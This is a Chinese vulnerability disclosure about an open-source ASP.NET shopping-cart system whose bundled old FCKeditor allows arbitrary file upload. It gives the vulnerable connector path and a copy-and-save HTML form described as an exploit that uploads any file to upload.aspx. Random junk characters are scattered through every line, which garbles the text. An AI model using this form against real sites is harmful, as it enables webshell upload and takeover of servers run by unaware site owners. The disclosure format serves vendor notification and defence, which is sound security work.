披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
, _9 F" y# |9 C 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开4 j" w0 ~, J/ u( D
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。" i5 D+ I& X" Q* W. p$ g3 _* P8 g
详细说明:其他版本我没测试,估计也是一样的问题
5 a3 W9 w: C, U8 X$ n2 | http://127.0.0.1/controls/fckedi ... aspx/connector.aspx( L, n- n1 x% t; r7 b$ v4 |. W5 q
跳转到网站根目录上传任意文件。+ D j7 ?6 @( v: z1 V) O/ @
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件! \& I. {9 O2 n8 s3 i5 C
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">. M! C1 i9 a! k o! J( O
Upload a new file:<br>0 @) y" |/ |# l+ j. t1 J
<input type="file" name="NewFile" size="50"><br>3 G! d, I2 X4 E* ^3 l
<input id="btnUpload" type="submit" value="Upload">8 a, B5 V- t0 D7 M" U; t+ I& e" T
</form> |